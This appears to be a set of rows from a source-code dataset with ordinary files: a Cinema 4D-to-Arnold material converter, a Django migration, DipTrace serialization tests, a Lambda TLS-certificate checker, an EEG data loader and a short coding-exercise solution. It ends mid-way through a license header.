    a.connect_beauty(standard_node.get_node(), 0)

    # Diffuse: image node if a texture exists, else the plain material color.
    node_diffuse_pict = None
    if diffuse_path:
        node_diffuse_pict = a.create_shader(a.ARNOLD_SHADER_GV, "image", 100, 100)
        node_diffuse_pict.set_parameter("image.filename", diffuse_path)
        node_diffuse_pict.get_node().SetName("Diff image")
        a.create_connection(node_diffuse_pict.get_node(), 0, standard_node.get_node(), "standard_surface.base_color")
    else:
        standard_node.set_parameter("standard_surface.base_color", mat[c4d.MATERIAL_COLOR_COLOR])

    # Specular: dedicated reflectance texture, else reuse the diffuse image,
    # else a plain 0.5 weight.
    if reflectance_path:
        node_specular_pict = a.create_shader(a.ARNOLD_SHADER_GV, "image", 100, 200)
        node_specular_pict.set_parameter("image.filename", reflectance_path)
        node_specular_pict.get_node().SetName("Spec image")
        a.create_connection(node_specular_pict.get_node(), 0, standard_node.get_node(), "standard_surface.specular")
        # BUG FIX: the original referenced node_diffuse_pict unconditionally
        # here, raising NameError for materials that have a reflectance
        # texture but no diffuse texture. Only wire the tint when the
        # diffuse image node exists.
        if node_diffuse_pict:
            a.create_connection(node_diffuse_pict.get_node(), 0, standard_node.get_node(), "standard_surface.specular_color")
    elif node_diffuse_pict:
        a.create_connection(node_diffuse_pict.get_node(), 0, standard_node.get_node(), "standard_surface.specular")
        a.create_connection(node_diffuse_pict.get_node(), 0, standard_node.get_node(), "standard_surface.specular_color")
    else:
        standard_node.set_parameter("standard_surface.specular", 0.5)

    # Normal: route the map through a bump2d node.
    if normal_path:
        node_normal_pict = a.create_shader(a.ARNOLD_SHADER_GV, "image", 100, 300)
        node_normal_pict.set_parameter("image.filename", normal_path)
        node_normal_pict.get_node().SetName("Normal image")
        node_bump = a.create_shader(a.ARNOLD_SHADER_GV, "bump2d", 350, 300)
        node_bump.set_parameter("bump2d.bump_height", 0.1)
        a.create_connection(node_normal_pict.get_node(), 0, node_bump.get_node(), "bump2d.bump_map")
        a.create_connection(node_bump.get_node(), 0, standard_node.get_node(), "standard_surface.normal")

    # Alpha: drives opacity, optionally through a complement (invert) node.
    if alpha_path:
        node_alpha_pict = a.create_shader(a.ARNOLD_SHADER_GV, "image", 100, 400)
        node_alpha_pict.set_parameter("image.filename", alpha_path)
        node_alpha_pict.get_node().SetName("Alpha image")
        if alpha_invert:
            node_invert_alpha = a.create_shader(a.ARNOLD_SHADER_GV, "complement", 350, 400)
            a.create_connection(node_alpha_pict.get_node(), 0, node_invert_alpha.get_node(), "complement.input")
            a.create_connection(node_invert_alpha.get_node(), 0, standard_node.get_node(), "standard_surface.opacity")
        else:
            a.create_connection(node_alpha_pict.get_node(), 0, standard_node.get_node(), "standard_surface.opacity")
def main():
    """Replace every selected standard c4d material with an Arnold conversion."""
    doc = c4d.documents.GetActiveDocument()
    if not doc:
        return
    doc.StartUndo()
    # Iterate in reverse so removing a material doesn't disturb the traversal.
    # The redundant `buffer_mat = mat` alias from the original was dropped.
    for mat in reversed(doc.GetActiveMaterials()):
        if mat.CheckType(c4d.Mmaterial):
            convert_c4d_to_arnold(doc, mat)
            doc.AddUndo(c4d.UNDOTYPE_DELETE, mat)
            mat.Remove()
    doc.EndUndo()
    c4d.EventAdd()
if __name__ == '__main__':
main() | """
08-26-2017
Basic exemple of the arnold python wrapper.
It convert diffuse, first layer of reflectance, normal and alpha into a correct arnold shader.
"""
import c4d
import os
from arnold_wrapper.Arnold import Arnold
def get_reflectance(mat):
    """Return the texture shader of the c4d reflectance channel slot, or None.

    The entire lookup is guarded: the parameter-ID arithmetic previously sat
    outside the try block, so a material type without reflectance constants
    could raise instead of returning None.
    """
    filename = None
    try:
        # Parameter-ID offset of the reflectance layer's data block.
        # NOTE(review): the *4 offset looks like it addresses the 4th layer
        # block, while the original docstring said "first slot" -- confirm.
        base = c4d.REFLECTION_LAYER_LAYER_DATA + c4d.REFLECTION_LAYER_LAYER_SIZE * 4
        filename = mat[base + c4d.REFLECTION_LAYER_COLOR_TEXTURE]
    except Exception:  # was a bare `except:`, which also swallowed KeyboardInterrupt
        pass
    return filename
def get_normal(mat):
    """Return the texture shader of the c4d material's normal channel, or None."""
    filename = None
    try:
        filename = mat[c4d.MATERIAL_NORMAL_SHADER]
    except Exception:  # was a bare `except:`; narrowed so Ctrl-C still works
        pass
    return filename
def get_diffuse(mat):
    """Return the texture shader of the c4d material's color channel, or None."""
    filename = None
    try:
        filename = mat[c4d.MATERIAL_COLOR_SHADER]
    except Exception:  # was a bare `except:`; narrowed so Ctrl-C still works
        pass
    return filename
def get_alpha(mat):
    """Return (alpha texture shader, invert flag) of the c4d material.

    Yields (None, False) when the material exposes no alpha channel data.
    """
    filename = None
    inverted = False
    try:
        filename = mat[c4d.MATERIAL_ALPHA_SHADER]
        inverted = mat[c4d.MATERIAL_ALPHA_INVERT]
    except Exception:  # was a bare `except:`; narrowed so Ctrl-C still works
        pass
    return filename, inverted
def past_assignment(doc, source, dest):
    """Re-point every texture tag using the `source` material to `dest`.

    Walks the material's assignment links and rewrites each linked texture
    tag, registering one undo step per tag on `doc`.
    """
    obj_link = source[c4d.ID_MATERIALASSIGNMENTS]
    # `range(0, n)` and the dead `tag = None` pre-initialization removed.
    for i in range(obj_link.GetObjectCount()):
        tag = obj_link.ObjectFromIndex(doc, i)
        if tag:
            doc.AddUndo(c4d.UNDOTYPE_CHANGE, tag)
            tag[c4d.TEXTURETAG_MATERIAL] = dest
def get_filepath(sha):
    """Return the file path stored in a bitmap shader, or None if unavailable."""
    # Bail out unless we were handed a bitmap shader with a filename set.
    if not sha or not sha.CheckType(c4d.Xbitmap):
        return None
    full_path = sha[c4d.BITMAPSHADER_FILENAME]
    return str(full_path) if full_path else None
def convert_c4d_to_arnold(doc, mat):
    """Convert a standard c4d material into an Arnold standard_surface material.

    Copies the diffuse, reflectance, normal and alpha channels into an
    equivalent Arnold shader network, mirrors the material name and object
    assignments, and registers undo steps on `doc`.
    """
    a = Arnold()

    # Gather the source textures; each path is None when the channel is unset.
    diffuse = get_diffuse(mat)
    diffuse_path = get_filepath(diffuse)
    reflectance = get_reflectance(mat)
    reflectance_path = get_filepath(reflectance)
    normal = get_normal(mat)
    normal_path = get_filepath(normal)
    alpha, alpha_invert = get_alpha(mat)
    alpha_path = get_filepath(alpha)

    # Create the replacement Arnold material and mirror name/assignments.
    new_mat = c4d.BaseMaterial(a.ARNOLD_MATERIAL)
    doc.InsertMaterial(new_mat)
    doc.AddUndo(c4d.UNDOTYPE_NEW, new_mat)
    new_mat.SetName(mat.GetName())
    past_assignment(doc, mat, new_mat)

    a.set_mat(new_mat)
    standard_node = a.create_shader(a.ARNOLD_SHADER_GV, "standard_surface", 700, 200)
    a.connect_beauty(standard_node.get_node(), 0)

    # Diffuse: image node if a texture exists, else the plain material color.
    node_diffuse_pict = None
    if diffuse_path:
        node_diffuse_pict = a.create_shader(a.ARNOLD_SHADER_GV, "image", 100, 100)
        node_diffuse_pict.set_parameter("image.filename", diffuse_path)
        node_diffuse_pict.get_node().SetName("Diff image")
        a.create_connection(node_diffuse_pict.get_node(), 0, standard_node.get_node(), "standard_surface.base_color")
    else:
        standard_node.set_parameter("standard_surface.base_color", mat[c4d.MATERIAL_COLOR_COLOR])

    # Specular: dedicated reflectance texture, else reuse the diffuse image,
    # else a plain 0.5 weight.
    if reflectance_path:
        node_specular_pict = a.create_shader(a.ARNOLD_SHADER_GV, "image", 100, 200)
        node_specular_pict.set_parameter("image.filename", reflectance_path)
        node_specular_pict.get_node().SetName("Spec image")
        a.create_connection(node_specular_pict.get_node(), 0, standard_node.get_node(), "standard_surface.specular")
        # BUG FIX: the original referenced node_diffuse_pict unconditionally
        # here, raising NameError for materials that have a reflectance
        # texture but no diffuse texture. Only wire the tint when the
        # diffuse image node exists.
        if node_diffuse_pict:
            a.create_connection(node_diffuse_pict.get_node(), 0, standard_node.get_node(), "standard_surface.specular_color")
    elif node_diffuse_pict:
        a.create_connection(node_diffuse_pict.get_node(), 0, standard_node.get_node(), "standard_surface.specular")
        a.create_connection(node_diffuse_pict.get_node(), 0, standard_node.get_node(), "standard_surface.specular_color")
    else:
        standard_node.set_parameter("standard_surface.specular", 0.5)

    # Normal: route the map through a bump2d node.
    if normal_path:
        node_normal_pict = a.create_shader(a.ARNOLD_SHADER_GV, "image", 100, 300)
        node_normal_pict.set_parameter("image.filename", normal_path)
        node_normal_pict.get_node().SetName("Normal image")
        node_bump = a.create_shader(a.ARNOLD_SHADER_GV, "bump2d", 350, 300)
        node_bump.set_parameter("bump2d.bump_height", 0.1)
        a.create_connection(node_normal_pict.get_node(), 0, node_bump.get_node(), "bump2d.bump_map")
        a.create_connection(node_bump.get_node(), 0, standard_node.get_node(), "standard_surface.normal")

    # Alpha: drives opacity, optionally through a complement (invert) node.
    if alpha_path:
        node_alpha_pict = a.create_shader(a.ARNOLD_SHADER_GV, "image", 100, 400)
        node_alpha_pict.set_parameter("image.filename", alpha_path)
        node_alpha_pict.get_node().SetName("Alpha image")
        if alpha_invert:
            node_invert_alpha = a.create_shader(a.ARNOLD_SHADER_GV, "complement", 350, 400)
            a.create_connection(node_alpha_pict.get_node(), 0, node_invert_alpha.get_node(), "complement.input")
            a.create_connection(node_invert_alpha.get_node(), 0, standard_node.get_node(), "standard_surface.opacity")
        else:
            a.create_connection(node_alpha_pict.get_node(), 0, standard_node.get_node(), "standard_surface.opacity")
def main():
    """Replace every selected standard c4d material with an Arnold conversion."""
    doc = c4d.documents.GetActiveDocument()
    if not doc:
        return
    doc.StartUndo()
    # Iterate in reverse so removing a material doesn't disturb the traversal.
    # The redundant `buffer_mat = mat` alias from the original was dropped.
    for mat in reversed(doc.GetActiveMaterials()):
        if mat.CheckType(c4d.Mmaterial):
            convert_c4d_to_arnold(doc, mat)
            doc.AddUndo(c4d.UNDOTYPE_DELETE, mat)
            mat.Remove()
    doc.EndUndo()
    c4d.EventAdd()
if __name__ == '__main__':
main() | en | 0.545124 | 08-26-2017 Basic exemple of the arnold python wrapper. It convert diffuse, first layer of reflectance, normal and alpha into a correct arnold shader. Get the texture inside the first slot the c4d reflectance channel Get the texture inside the normal channel of a c4d mat Get the texture inside the diffuse channel of a c4d mat Get the texture inside the alpha channel of a c4d mat Copy assignement beetween source math to dest mat Get the file path of a Xbitmap Main function that convert c4d mat to arnold mat #Get material data #Create the new arnold shader #Copy the name #copy affectation #Set Diffuse #Set specular #Set normal #Set alpha | 2.824816 | 3 |
Collections/7_Company_Logo.py | FaranakAlikhah/ADM-HW1 | 0 | 6612426 | #!/usr/bin/env python
# coding: utf-8
# # section 5: Colloctions
#
# ### writer : <NAME> 1954128
# ### 7.Company Logo :
#
#
# In[ ]:
import math
import os
import random
import re
import sys
from collections import Counter
if __name__ == '__main__':
s =sorted(input())
rep=Counter(s).most_common(3)
for i in rep:
print(*i)
#
| #!/usr/bin/env python
# coding: utf-8
# # section 5: Colloctions
#
# ### writer : <NAME> 1954128
# ### 7.Company Logo :
#
#
# In[ ]:
import math
import os
import random
import re
import sys
from collections import Counter
if __name__ == '__main__':
s =sorted(input())
rep=Counter(s).most_common(3)
for i in rep:
print(*i)
#
| en | 0.446462 | #!/usr/bin/env python # coding: utf-8 # # section 5: Colloctions # # ### writer : <NAME> 1954128 # ### 7.Company Logo : # # # In[ ]: # | 3.052895 | 3 |
classes/migrations/0016_remove_classinstance_instructors.py | ericrobskyhuntley/vialab.mit.edu | 0 | 6612427 | # Generated by Django 3.0.4 on 2020-12-17 23:51
from django.db import migrations
class Migration(migrations.Migration):
    # Schema migration: drop the `instructors` field from the
    # `classinstance` model.
    # NOTE(review): RemoveField discards that field's data on migrate;
    # ensure nothing still references ClassInstance.instructors.

    dependencies = [
        ('classes', '0015_auto_20201217_1850'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='classinstance',
            name='instructors',
        ),
    ]
| # Generated by Django 3.0.4 on 2020-12-17 23:51
from django.db import migrations
class Migration(migrations.Migration):
    # Schema migration: drop the `instructors` field from the
    # `classinstance` model.
    # NOTE(review): RemoveField discards that field's data on migrate;
    # ensure nothing still references ClassInstance.instructors.

    dependencies = [
        ('classes', '0015_auto_20201217_1850'),
    ]

    operations = [
        migrations.RemoveField(
            model_name='classinstance',
            name='instructors',
        ),
    ]
| en | 0.834361 | # Generated by Django 3.0.4 on 2020-12-17 23:51 | 1.348999 | 1 |
tests/test_MaskPaste.py | kolod/DipTrace-Library-Generator | 0 | 6612428 | <filename>tests/test_MaskPaste.py
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Copyright 2021-... <NAME> <<EMAIL>>.
# This program is distributed under the MIT license.
# Glory to Ukraine!
import unittest
import DipTrace
class TestMaskPaste(unittest.TestCase):
    """Serialization tests for DipTrace.MaskPaste: each test compares
    str(MaskPaste(...)) against the expected XML fragment."""

    def test_constructor_1(self):
        """A default MaskPaste serializes to an empty element."""
        expected = '<MaskPaste/>\n'
        actual = DipTrace.MaskPaste()
        self.assertEqual(expected, str(actual))

    def test_constructor_2(self):
        """Mask and paste types serialize as element attributes."""
        expected = '<MaskPaste TopMask="Open" BotMask="Tented" TopPaste="No Solder" BotPaste="Solder"/>\n'
        actual = DipTrace.MaskPaste(
            top_mask=DipTrace.MaskType.Open,
            bottom_mask=DipTrace.MaskType.Tented,
            top_paste=DipTrace.PasteType.NoSolder,
            bottom_paste=DipTrace.PasteType.Solder
        )
        self.assertEqual(expected, str(actual))

    def test_constructor_3(self):
        """Swell/shrink serialize, getters round-trip, and resetting every
        field restores the empty element."""
        expected = \
            '<MaskPaste TopMask="Open" BotMask="Tented" TopPaste="No Solder" BotPaste="Solder" ' \
            'CustomSwell="0.05" CustomShrink="0.1"/>\n'
        actual = DipTrace.MaskPaste(
            top_mask=DipTrace.MaskType.Open,
            bottom_mask=DipTrace.MaskType.Tented,
            top_paste=DipTrace.PasteType.NoSolder,
            bottom_paste=DipTrace.PasteType.Solder,
            swell=0.05,
            shrink=0.1
        )
        self.assertEqual(expected, str(actual))
        self.assertEqual(DipTrace.MaskType.Open, actual.top_mask)
        self.assertEqual(DipTrace.MaskType.Tented, actual.bottom_mask)
        self.assertEqual(DipTrace.PasteType.NoSolder, actual.top_paste)
        self.assertEqual(DipTrace.PasteType.Solder, actual.bottom_paste)
        self.assertEqual(0.05, actual.swell)
        self.assertEqual(0.1, actual.shrink)
        # Reset everything back to defaults -> empty element again.
        # NOTE(review): bottom_mask is assigned a PasteType value here while
        # the constructor used MaskType -- confirm the enums are meant to be
        # interchangeable for "Common".
        actual.top_mask = DipTrace.MaskType.Common
        actual.top_paste = None
        actual.bottom_mask = DipTrace.PasteType.Common
        actual.bottom_paste = None
        actual.swell = None
        actual.shrink = None
        self.assertEqual('<MaskPaste/>\n', str(actual))

    def test_constructor_4(self):
        """Segment-based paste serializes nested Top/BotSegments items, and
        the `segments` tuple round-trips and can be cleared."""
        expected = \
            '<MaskPaste TopMask="By Paste" BotMask="By Paste" TopPaste="Segments" ' \
            'BotPaste="Segments" Segment_Percent="50" Segment_EdgeGap="0.3" Segment_Gap="0.2" Segment_Side="1">\n' \
            ' <TopSegments>\n' \
            ' <Item X1="-0.53" Y1="0.53" X2="0.53" Y2="-0.53"/>\n' \
            ' </TopSegments>\n' \
            ' <BotSegments>\n' \
            ' <Item X1="-0.53" Y1="0.53" X2="0.53" Y2="-0.53"/>\n' \
            ' </BotSegments>\n' \
            '</MaskPaste>\n'
        actual = DipTrace.MaskPaste(
            top_mask=DipTrace.MaskType.ByPaste,
            bottom_mask=DipTrace.MaskType.ByPaste,
            top_paste=DipTrace.PasteType.Segments,
            bottom_paste=DipTrace.PasteType.Segments,
            segments=(50, 0.3, 0.2, 1),
            top_segments=(DipTrace.Segment(x1=-0.53, y1=0.53, x2=0.53, y2=-0.53),),
            bottom_segments=(DipTrace.Segment(x1=-0.53, y1=0.53, x2=0.53, y2=-0.53),)
        )
        self.assertEqual(expected, str(actual))
        self.assertTupleEqual((50, 0.3, 0.2, 1), actual.segments)
        actual.segments = None
        self.assertEqual(None, actual.segments)
| <filename>tests/test_MaskPaste.py
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# Copyright 2021-... <NAME> <<EMAIL>>.
# This program is distributed under the MIT license.
# Glory to Ukraine!
import unittest
import DipTrace
class TestMaskPaste(unittest.TestCase):
    """Serialization tests for DipTrace.MaskPaste: each test compares
    str(MaskPaste(...)) against the expected XML fragment."""

    def test_constructor_1(self):
        """A default MaskPaste serializes to an empty element."""
        expected = '<MaskPaste/>\n'
        actual = DipTrace.MaskPaste()
        self.assertEqual(expected, str(actual))

    def test_constructor_2(self):
        """Mask and paste types serialize as element attributes."""
        expected = '<MaskPaste TopMask="Open" BotMask="Tented" TopPaste="No Solder" BotPaste="Solder"/>\n'
        actual = DipTrace.MaskPaste(
            top_mask=DipTrace.MaskType.Open,
            bottom_mask=DipTrace.MaskType.Tented,
            top_paste=DipTrace.PasteType.NoSolder,
            bottom_paste=DipTrace.PasteType.Solder
        )
        self.assertEqual(expected, str(actual))

    def test_constructor_3(self):
        """Swell/shrink serialize, getters round-trip, and resetting every
        field restores the empty element."""
        expected = \
            '<MaskPaste TopMask="Open" BotMask="Tented" TopPaste="No Solder" BotPaste="Solder" ' \
            'CustomSwell="0.05" CustomShrink="0.1"/>\n'
        actual = DipTrace.MaskPaste(
            top_mask=DipTrace.MaskType.Open,
            bottom_mask=DipTrace.MaskType.Tented,
            top_paste=DipTrace.PasteType.NoSolder,
            bottom_paste=DipTrace.PasteType.Solder,
            swell=0.05,
            shrink=0.1
        )
        self.assertEqual(expected, str(actual))
        self.assertEqual(DipTrace.MaskType.Open, actual.top_mask)
        self.assertEqual(DipTrace.MaskType.Tented, actual.bottom_mask)
        self.assertEqual(DipTrace.PasteType.NoSolder, actual.top_paste)
        self.assertEqual(DipTrace.PasteType.Solder, actual.bottom_paste)
        self.assertEqual(0.05, actual.swell)
        self.assertEqual(0.1, actual.shrink)
        # Reset everything back to defaults -> empty element again.
        # NOTE(review): bottom_mask is assigned a PasteType value here while
        # the constructor used MaskType -- confirm the enums are meant to be
        # interchangeable for "Common".
        actual.top_mask = DipTrace.MaskType.Common
        actual.top_paste = None
        actual.bottom_mask = DipTrace.PasteType.Common
        actual.bottom_paste = None
        actual.swell = None
        actual.shrink = None
        self.assertEqual('<MaskPaste/>\n', str(actual))

    def test_constructor_4(self):
        """Segment-based paste serializes nested Top/BotSegments items, and
        the `segments` tuple round-trips and can be cleared."""
        expected = \
            '<MaskPaste TopMask="By Paste" BotMask="By Paste" TopPaste="Segments" ' \
            'BotPaste="Segments" Segment_Percent="50" Segment_EdgeGap="0.3" Segment_Gap="0.2" Segment_Side="1">\n' \
            ' <TopSegments>\n' \
            ' <Item X1="-0.53" Y1="0.53" X2="0.53" Y2="-0.53"/>\n' \
            ' </TopSegments>\n' \
            ' <BotSegments>\n' \
            ' <Item X1="-0.53" Y1="0.53" X2="0.53" Y2="-0.53"/>\n' \
            ' </BotSegments>\n' \
            '</MaskPaste>\n'
        actual = DipTrace.MaskPaste(
            top_mask=DipTrace.MaskType.ByPaste,
            bottom_mask=DipTrace.MaskType.ByPaste,
            top_paste=DipTrace.PasteType.Segments,
            bottom_paste=DipTrace.PasteType.Segments,
            segments=(50, 0.3, 0.2, 1),
            top_segments=(DipTrace.Segment(x1=-0.53, y1=0.53, x2=0.53, y2=-0.53),),
            bottom_segments=(DipTrace.Segment(x1=-0.53, y1=0.53, x2=0.53, y2=-0.53),)
        )
        self.assertEqual(expected, str(actual))
        self.assertTupleEqual((50, 0.3, 0.2, 1), actual.segments)
        actual.segments = None
        self.assertEqual(None, actual.segments)
| en | 0.55591 | #!/usr/bin/python3 # -*- coding: utf-8 -*- # Copyright 2021-... <NAME> <<EMAIL>>. # This program is distributed under the MIT license. # Glory to Ukraine! | 2.962075 | 3 |
hsm_software/sw/hsm_tools/cryptech/cryptech/__init__.py | DiamondKeySecurity/HSM | 0 | 6612429 | #!/usr/bin/env python
# Copyright (c) 2018, 2019 Diamond Key Security, NFP All rights reserved.
#
__all__ = ["libhal"]
| #!/usr/bin/env python
# Copyright (c) 2018, 2019 Diamond Key Security, NFP All rights reserved.
#
__all__ = ["libhal"]
| en | 0.653147 | #!/usr/bin/env python # Copyright (c) 2018, 2019 Diamond Key Security, NFP All rights reserved. # | 1.052075 | 1 |
functions/tls_cert_checker/tls_cert_checker.py | radon-h2020/radon-function-lib | 0 | 6612430 | <reponame>radon-h2020/radon-function-lib
# this python program was written using python 3.8.6
from pprint import pprint
import json
import sys
import check_tls_certs
# from check_tls_certs import main as check_tls_cert
"""
This lambda function takes a domain name or a list of domain names
and returns an overview of the status of the SSL/TLS certificates served.
The function uses check_tls_cert by @fschulze - https://github.com/fschulze/check-tls-certs
This function was developed by @zanderhavgaard
"""
# prefix for error messages:
ERROR_PREFIX = "ERROR:"
def handler(event, context):
    """AWS Lambda entry point: report TLS certificate status for the
    requested domains.

    Returns either an error string (from whichever stage failed) or an
    API-Gateway-style response dict with a JSON body.
    """
    # API Gateway wraps the request payload in a JSON "body" field.
    payload = json.loads(event["body"]) if "body" in event else event

    err, domains = parse_parameters(params=payload)
    if err:
        return err

    err, raw_result = check_domains(domains=domains)
    if err:
        return err

    err, report = format_result(result=raw_result)
    if err:
        return err

    return {"statusCode": 200, "body": json.dumps(report)}
def check_domains(domains: list) -> (str, list):
    """Check the TLS certificates of `domains` with check_tls_certs.

    Returns (error, result); `error` is always None here -- the guard that
    mapped exceptions to an error string was disabled upstream (the old
    commented-out try/except has been removed), so any failure from
    check_tls_certs propagates to the caller.
    """
    error = None
    # Invocation settings: no domain file, warn at 0 days to expiry,
    # maximum verbosity.
    result = check_tls_certs.main(file=None, domain=domains, expiry_warn=0, verbose=2)
    return error, result
def format_result(result: list) -> (str, list):
    """Convert check_tls_certs result tuples into JSON-serializable dicts.

    Each input item is a (domain, messages, expiration) tuple. Returns
    (error, formatted); `error` is None on success.
    """
    error = None
    formatted = []
    try:
        for domain, messages, expiration in result:
            entry = {
                "Domain": domain[0],
                # Each message is a 2-tuple (presumably level/text);
                # render it as "first: second".
                "messages": [f"{first}: {second}" for first, second in messages],
                "Certificate Expiry Date": str(expiration),
            }
            formatted.append(entry)
    except Exception:
        error = f"{ERROR_PREFIX}: There was an error formatting the result."
    return error, formatted
def parse_parameters(params: dict) -> tuple:
    """Extract the list of domain names from the request parameters.

    Accepts a single name under "domain" and/or a list under "domains".
    Returns (error, domains); `error` is None when at least one domain was
    supplied. (The original annotation claimed a (str, str, str) 3-tuple,
    which did not match the actual 2-tuple return value; the error message
    was also missing the word "provide".)
    """
    error = None
    domains = []
    if "domain" in params:
        domains.append(params["domain"])
    if "domains" in params:
        domains.extend(params["domains"])
    # With no domains at all the request cannot be served.
    if not domains:
        error = f"{ERROR_PREFIX} you must provide at least one domain name with the 'domain' argument, or a list of domains using the 'domains' argument."
    return error, domains
# Local smoke test -- only executed when this file is run from the CLI,
# never when imported as a Lambda handler module.
if __name__ == "__main__":
    from pprint import pprint

    # Alternative fixtures kept for manual testing:
    # test_json_file = "tests/test_domain1.json"
    # test_json_file = "tests/test_domain_expired.json"
    test_json_file = "tests/test_domains.json"
    with open(test_json_file) as test_json:
        test_event = json.load(test_json)
    test_context = {}
    test_res = handler(test_event, test_context)
    # Pretty-print the decoded JSON body of the Lambda response.
    pprint(json.loads(test_res["body"]))
| # this python program was written using python 3.8.6
from pprint import pprint
import json
import sys
import check_tls_certs
# from check_tls_certs import main as check_tls_cert
"""
This lambda function takes a domain name or a list of domain names
and returns an overview of the status of the SSL/TLS certificates served.
The function uses check_tls_cert by @fschulze - https://github.com/fschulze/check-tls-certs
This function was developed by @zanderhavgaard
"""
# prefix for error messages:
ERROR_PREFIX = "ERROR:"
def handler(event, context):
    """AWS Lambda entry point: report TLS certificate status for the
    requested domains.

    Returns either an error string (from whichever stage failed) or an
    API-Gateway-style response dict with a JSON body.
    """
    # API Gateway wraps the request payload in a JSON "body" field.
    payload = json.loads(event["body"]) if "body" in event else event

    err, domains = parse_parameters(params=payload)
    if err:
        return err

    err, raw_result = check_domains(domains=domains)
    if err:
        return err

    err, report = format_result(result=raw_result)
    if err:
        return err

    return {"statusCode": 200, "body": json.dumps(report)}
def check_domains(domains: list) -> (str, list):
    """Check the TLS certificates of `domains` with check_tls_certs.

    Returns (error, result); `error` is always None here -- the guard that
    mapped exceptions to an error string was disabled upstream (the old
    commented-out try/except has been removed), so any failure from
    check_tls_certs propagates to the caller.
    """
    error = None
    # Invocation settings: no domain file, warn at 0 days to expiry,
    # maximum verbosity.
    result = check_tls_certs.main(file=None, domain=domains, expiry_warn=0, verbose=2)
    return error, result
def format_result(result: list) -> (str, list):
    """Convert check_tls_certs result tuples into JSON-serializable dicts.

    Each input item is a (domain, messages, expiration) tuple. Returns
    (error, formatted); `error` is None on success.
    """
    error = None
    formatted = []
    try:
        for domain, messages, expiration in result:
            entry = {
                "Domain": domain[0],
                # Each message is a 2-tuple (presumably level/text);
                # render it as "first: second".
                "messages": [f"{first}: {second}" for first, second in messages],
                "Certificate Expiry Date": str(expiration),
            }
            formatted.append(entry)
    except Exception:
        error = f"{ERROR_PREFIX}: There was an error formatting the result."
    return error, formatted
def parse_parameters(params: dict) -> tuple:
    """Extract the list of domain names from the request parameters.

    Accepts a single name under "domain" and/or a list under "domains".
    Returns (error, domains); `error` is None when at least one domain was
    supplied. (The original annotation claimed a (str, str, str) 3-tuple,
    which did not match the actual 2-tuple return value; the error message
    was also missing the word "provide".)
    """
    error = None
    domains = []
    if "domain" in params:
        domains.append(params["domain"])
    if "domains" in params:
        domains.extend(params["domains"])
    # With no domains at all the request cannot be served.
    if not domains:
        error = f"{ERROR_PREFIX} you must provide at least one domain name with the 'domain' argument, or a list of domains using the 'domains' argument."
    return error, domains
# Local smoke test -- only executed when this file is run from the CLI,
# never when imported as a Lambda handler module.
if __name__ == "__main__":
    from pprint import pprint

    # Alternative fixtures kept for manual testing:
    # test_json_file = "tests/test_domain1.json"
    # test_json_file = "tests/test_domain_expired.json"
    test_json_file = "tests/test_domains.json"
    with open(test_json_file) as test_json:
        test_event = json.load(test_json)
    test_context = {}
    test_res = handler(test_event, test_context)
    # Pretty-print the decoded JSON body of the Lambda response.
    pprint(json.loads(test_res["body"]))
EEG_Lightning/dassl/data/datasets/general_dataset_v1.py | mcd4874/NeurIPS_competition | 23 | 6612431 | import os.path as osp
from dassl.data.datasets.build import DATASET_REGISTRY
from dassl.data.datasets.base_dataset import Datum, DatasetBase,EEGDatum
from dassl.data.datasets.ProcessDataBase import ProcessDataBase
from scipy.io import loadmat
import numpy as np
@DATASET_REGISTRY.register()
class GENERAL_DATASET(ProcessDataBase):
# dataset_dir = 'KAGGLE_BCI'
# file_name = 'KaggleBCI.mat'
# domains = [0,3,4,5,6,7,8]
def __init__(self, cfg):
super().__init__(cfg)
# assum that number of subjects represent the domain
def _read_data(self,data_path):
"""
Process data from .mat file
Re-implement this function to process new dataset
Generate train data and test data with shape (subjects,trials,channels,frequency)
.mat data format shall be
"train_data":train_data,
"train_label":train_label,
"test_data":test_data,
"test_label":test_label
"""
temp = loadmat(data_path)
total_data = temp['train_data']
total_label = temp['train_label']
total_label = np.array(total_label)
total_label = np.squeeze(total_label)
total_label = total_label.astype(int)
test_data = temp['test_data']
test_lbl = temp['test_label']
test_data = np.array(test_data) # (subjects,trials,channels,frequency)
test_lbl = np.array(test_lbl)
test_lbl = test_lbl.astype(int)
print("train data shape : {} | train label shape : {}".format(total_data.shape,total_label.shape))
print("test data shape : {} | test label shape : {}".format(test_data.shape, test_lbl.shape))
return [total_data,total_label,test_data,test_lbl]
| import os.path as osp
from dassl.data.datasets.build import DATASET_REGISTRY
from dassl.data.datasets.base_dataset import Datum, DatasetBase,EEGDatum
from dassl.data.datasets.ProcessDataBase import ProcessDataBase
from scipy.io import loadmat
import numpy as np
@DATASET_REGISTRY.register()
class GENERAL_DATASET(ProcessDataBase):
# dataset_dir = 'KAGGLE_BCI'
# file_name = 'KaggleBCI.mat'
# domains = [0,3,4,5,6,7,8]
def __init__(self, cfg):
super().__init__(cfg)
# assum that number of subjects represent the domain
def _read_data(self,data_path):
"""
Process data from .mat file
Re-implement this function to process new dataset
Generate train data and test data with shape (subjects,trials,channels,frequency)
.mat data format shall be
"train_data":train_data,
"train_label":train_label,
"test_data":test_data,
"test_label":test_label
"""
temp = loadmat(data_path)
total_data = temp['train_data']
total_label = temp['train_label']
total_label = np.array(total_label)
total_label = np.squeeze(total_label)
total_label = total_label.astype(int)
test_data = temp['test_data']
test_lbl = temp['test_label']
test_data = np.array(test_data) # (subjects,trials,channels,frequency)
test_lbl = np.array(test_lbl)
test_lbl = test_lbl.astype(int)
print("train data shape : {} | train label shape : {}".format(total_data.shape,total_label.shape))
print("test data shape : {} | test label shape : {}".format(test_data.shape, test_lbl.shape))
return [total_data,total_label,test_data,test_lbl]
| en | 0.684955 | # dataset_dir = 'KAGGLE_BCI' # file_name = 'KaggleBCI.mat' # domains = [0,3,4,5,6,7,8] # assum that number of subjects represent the domain Process data from .mat file Re-implement this function to process new dataset Generate train data and test data with shape (subjects,trials,channels,frequency) .mat data format shall be "train_data":train_data, "train_label":train_label, "test_data":test_data, "test_label":test_label # (subjects,trials,channels,frequency) | 2.438537 | 2 |
tests/riscv/state_transition/state_transition_partial_force.py | Wlgen/force-riscv | 111 | 6612432 | <gh_stars>100-1000
#
# Copyright (C) [2020] Futurewei Technologies, Inc.
#
# FORCE-RISCV is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
